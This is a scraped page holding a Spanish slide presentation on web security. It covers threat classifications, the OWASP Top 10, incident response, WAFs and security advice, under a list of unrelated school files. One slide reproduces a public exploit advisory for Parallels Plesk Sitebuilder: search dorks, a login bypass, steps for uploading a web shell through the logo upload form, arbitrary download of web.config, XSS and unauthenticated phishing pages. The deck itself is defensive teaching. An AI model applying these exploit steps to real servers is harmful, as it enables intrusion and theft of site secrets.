Fichas de Matemática TERCERO DE SECUNDARIA.pdfFichas de Matemática TERCERO DE SECUNDARIA.pdf
Fichas de Matemática TERCERO DE SECUNDARIA.pdf
 
sesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfsesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdf
 
Concurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptxConcurso José María Arguedas nacional.pptx
Concurso José María Arguedas nacional.pptx
 
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADOPLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
PLAN DE TUTORIA- PARA NIVEL PRIMARIA CUARTO GRADO
 
libro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación iniciallibro para colorear de Peppa pig, ideal para educación inicial
libro para colorear de Peppa pig, ideal para educación inicial
 
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdfPresentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
Presentacion minimalista aesthetic simple beige_20240415_224856_0000.pdf
 

Seguridad en la web

  • 1. ¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?
  • 2. ¿Puede mi sitio web sufrir un ataque? La respuesta es obvia:
  • 4. Introducción a los ataques existentes Clasificación de amenazas WEB Abuso de la funcionalidad: el abuso de funcionalidad es una técnica de ataque que utiliza las propias características y funciones de un sitio web para consumir, defraudar o eludir los mecanismos de control de acceso. Fuerza bruta: una ataque de fuerza bruta es un proceso automatizado de prueba y error que se utiliza para adivinar el nombre de usuario, la contraseña, el número de tarjeta de crédito o la clave criptográfica de una persona. Desbordamiento de almacenamiento intermedio: los exploits de desbordamiento de almacenamiento intermedio son ataques que alteran el flujo de una aplicación sobrescribiendo partes de la memoria. Usurpación de contenido: la usurpación de contenido es una técnica de ataque que se utiliza para hacer creer a un usuario que determinado contenido que aparece en un sitio web es legítimo y no procede de un origen externo.
  • 5. Introducción a los ataques existentes Clasificación de amenazas WEB Predicción de sesión/credenciales: la predicción de sesión/credenciales es un método de apropiación de identidad o suplantación de un usuario de sitio web. Deducir o adivinar el valor único que identifica la sesión o el usuario concreto que efectúa el ataque. Script entre sitios: el script entre sitios (XSS) es una técnica de ataque que obliga a un sitio web a duplicar el código ejecutable proporcionado por el atacante, que se carga en el navegador de un usuario. Un usuario de un script entre sitios puede verse expropiado de su cuenta (robo de cookies), su navegador puede ser redirigido a otra ubicación, o se le puede mostrar contenido fraudulento en el sitio web que esté visitando. Denegación de servicio: la denegación de servicio (DoS) es una técnica de ataque cuyo objetivo es impedir que un sitio web ofrezca una actividad normal a los usuarios.
  • 6. Introducción a los ataques existentes Clasificación de amenazas WEB Indexación de directorios: el listado/indexación automática de directorios es una función de servidor que lista todos los archivos en un directorio solicitado si el archivo básico normal (index.html/home.html/default.htm) no está presente. Ataque de serie de formato: los ataques de serie de formato alteran el flujo de una aplicación utilizando características de la biblioteca de formatos de series para acceder a otro espacio de la memoria. Filtrado de información: el filtraje de información se produce cuando un sitio web revela datos confidenciales, por ejemplo comentarios de un desarrollador o mensajes de error, que pueden ayudar a un atacante a aprovecharse del sistema. Anti automatización insuficiente: la anti automatización insuficiente se produce cuando un sitio web permite a un atacante automatizar un proceso que sólo debe realizarse manualmente.
  • 7. Introducción a los ataques existentes Clasificación de amenazas WEB Autenticación insuficiente: la autenticación insuficiente se produce cuando un sitio web permite a un atacante acceder a contenido o funciones confidenciales sin autenticar correctamente sus permisos de acceso. Autorización insuficiente: la autorización insuficiente se produce cuando un sitio web permite el acceso a contenido o funciones confidenciales que deben requerir un incremento de las restricciones de control de acceso. Validación de proceso insuficiente: la validación de proceso insuficiente se produce cuando un sitio web permite a un atacante eludir el control de flujo previsto de una aplicación. Caducidad de sesión insuficiente: la caducidad de sesión insuficiente se produce cuando un sitio web permite a un atacante reutilizar credenciales de sesión o ID de sesión antiguos para llevar a cabo la autorización. La caducidad de sesión insuficiente aumenta la exposición de un sitio web a los ataques que roban o suplantan a otros usuarios.
  • 8. Introducción a los ataques existentes Clasificación de amenazas WEB Inyección LDAP: la inyección LDAP es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias LDAP (Lightweight Directory Access Protocol) a partir de entradas proporcionadas por los usuarios. Envío de mandatos del SO: el envío de mandatos del SO es una técnica de ataque utilizada para aprovecharse de los sitios web mediante la ejecución de mandatos del sistema operativo a través de la manipulación de la entrada de la aplicación. Cruce de vía de acceso: la técnica de ataque de cruce de vía de acceso fuerza el acceso a archivos, directorios y mandatos que pueden estar ubicados potencialmente fuera del directorio raíz de documentos. Un atacante podría manipular un URL de forma que el sitio web ejecutará o revelará el contenido de archivos arbitrarios en cualquier parte del servidor web.
  • 9. Introducción a los ataques existentes Clasificación de amenazas WEB Ubicación de recursos predecible: la ubicación de recursos predecible es una técnica de ataque utilizada para descubrir contenido y funciones ocultas de un sitio web. El ataque, que se vale de considerar la información de la que dispone, es una búsqueda de fuerza bruta en busca de contenido que no está pensado para mostrarse públicamente. Archivos temporales, archivos de copia de seguridad, archivos de configuración y archivos de ejemplo son todos ejemplos de archivos potencialmente sobrantes. Fijación de sesión: la fijación de sesión es una técnica de ataque que fuerza un ID de sesión de usuario a un valor explícito. Inyección SQL: la inyección SQL es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias SQL a partir de entradas proporcionadas por los usuarios. Inyección SSI: la inyección SSI (inclusión del lado del servidor) es una técnica de aprovechamiento del lado del servidor que permite a un atacante enviar código en una aplicación, que posteriormente el servidor web ejecutará localmente.
  • 10. Introducción a los ataques existentes Clasificación de amenazas WEB Validación de recuperación de contraseña débil: la validación de recuperación de contraseña débil se produce cuando un sitio web permite a un atacante obtener, cambiar o recuperar ilegalmente la contraseña de otro usuario. Inyección XPath: la inyección XPath es una técnica de ataque utilizada para aprovecharse de los sitios web que crean consultas XPath a partir de entradas proporcionadas por los usuarios.
  • 11. Introducción a los ataques existentes =¿$? Consecuencias derivadas de los ataques
  • 12. Introducción a los ataques existentes Panorama…
  • 13. Introducción a los ataques existentes Panorama… Crouching Yeti / Energetic Bear (Verano 2014)
  • 14. Introducción a los ataques existentes Panorama…
  • 15. Introducción a los ataques existentes
  • 16. Introducción a los ataques existentes
  • 17. Introducción a los ataques existentes http://www.ddossite.com/ http://youtu.be/vn-lU3Zu3dw http://youtu.be/aCacibJa0Ps
  • 18. Introducción a los ataques existentes http://www.digitalattackmap.com
  • 19. Introducción a los ataques existentes
  • 20. Introducción a los ataques existentes
  • 21. Introducción a los ataques existentes
  • 22. Introducción a los ataques existentes
  • 23. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:"© Copyright 2004-2007 SWsoft." ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # # version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard 2-uploading shell via Live HTTP Headers(Copyright 2004-2010) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"rn] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"rn] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config 4-xss(all version) you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • 24. Introducción a los ataques existentes
  • 25. Introducción a los ataques existentes
  • 26. Introducción a los ataques existentes El objetivo principal del TOP 10 OWASP es dar a conocer a los desarrolladores, diseñadores, arquitectos, gerentes, y organizaciones sobre las consecuencias de las vulnerabilidades de seguridad más importantes en aplicaciones web. El TOP 10 provee de técnicas básicas sobre como protegerse en estas áreas de alto riesgo y también provee orientación sobre los pasos a seguir. Que se hable de top 10 no significa que no existan más vulnerabilidades!! Simplemente son las más comunes.
  • 27.
  • 28.
  • 29.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 56.
  • 57.
  • 58.
  • 64. He sido atacado. ¿Ahora que hago? El procedimiento varía dependiendo de múltiples variables pero podría ser algo así: 1.- Poner el sitio web atacado offline. 2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar FUEGO PURIFICADOR o contratar servicios de desinfección. 3.- Revisar todas las posibles extensiones vulnerables o framework e intentar determinar el punto de entrada. 4.- Reinstalar framework, plugins, plantillas, bbdd, SO, … desde un backup que se sepa que está limpio. Parchear el posible punto de entrada. 5.-Cambiar todas las contraseñas 6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se han podido ver comprometidos datos de importancia, notificar a posibles usuarios afectados el incidente de seguridad.
  • 65. He sido atacado. ¿Ahora que hago? Denunciar si hemos sido victimas de un ataque Contratar servicios especializados de análisis forense para que en caso de que se quiera llevar a juicio el ataque, se disponga de pruebas válidas con las que afrontar la denuncia.
  • 66. WAF. Web Application Firewall Herramientas y servicios con los que protegernos Nos protege de: >Vulnerabilidades de sistema operativo >Vulnerabilidades de aplicación SQLi XSS LFI RFI DT … Nos tiene que quedar claro que las aplicaciones y sistemas operativos siguen siendo vulnerables. Parcheo Virtual
  • 67. WAF. Web Application Firewall Herramientas y servicios con los que protegernos De todos los colores y sabores: >Software (Open Source, Propietarios…) >Virtuales >Hardware >As a Service (En la nube)
  • 68. Herramientas y servicios con los que protegernos WAF. Web Application Firewall
  • 69. Herramientas y servicios con los que protegernos Sistemas Anti DDoS
  • 70. Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
  • 71. Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
  • 72. Herramientas y servicios con los que protegernos Autenticación multifactor / Protección de identidades digitales
  • 73. Herramientas y servicios con los que protegernos Hostings/Housings especializados
  • 74. Herramientas y servicios con los que protegernos Herramientas de hardening de frameworks especificos, buenas prácticas,… Guía básica seguridad Wordpress Inteco http://www.inteco.es/file/WbpsPPREE7nfCgs9ZBYoAQ Guía básica seguridad Joomla Inteco http://www.inteco.es/file/WbpsPPREE7naXKiMJlkT_g
  • 75. Herramientas y servicios con los que protegernos http://punkspider.hyperiongray.com
  • 76. Herramientas y servicios con los que protegernos http://sitecheck.sucuri.net/
  • 77. Herramientas y servicios con los que protegernos http://zulu.zscaler.com/
  • 78. Herramientas y servicios con los que protegernos
  • 79. Herramientas y servicios con los que protegernos
  • 80. Algunos consejos útiles Contar con profesionales del desarrollo web SEGURO Cuando se contrate el servicio de presencia web hablar de que ocurre en caso de que surjan vulnerabilidades, se sea victima de un ataque, tiempos de parcheo, Plan de contingencia…) Antes de poner una web online comprobar su seguridad (Revisión código, Auditoría WEB) Realizar asiduamente backups tanto de la base de datos como de la aplicación y sus ficheros asociados.
  • 81. Preparar un Plan de Recuperación ante incidentes. Entrenarse, ponerlo a prueba. No utilizar la misma contraseña para todas las cuentas Cifrar la documentación/datos online importantes Cambia de contraseñas cada cierto tiempo Usuarios y contraseñas personales e intransferibles Tener especial cuidado cuando se manejan datos sensibles (LOPD) Algunos consejos útiles
  • 82. Utilizar mecanismos de autenticación de múltiples factore. Llevar un control sobre los CMS instalados y los diferentes plugins (seguros)instalados Actualizar y parchear tanto sistemas como aplicaciones Integración de sistemas Captchas para evitar herramientas automatizadas. Contratar hostings, housings con servicios de seguridad adicionales (WAF, ADDoS) Algunos consejos útiles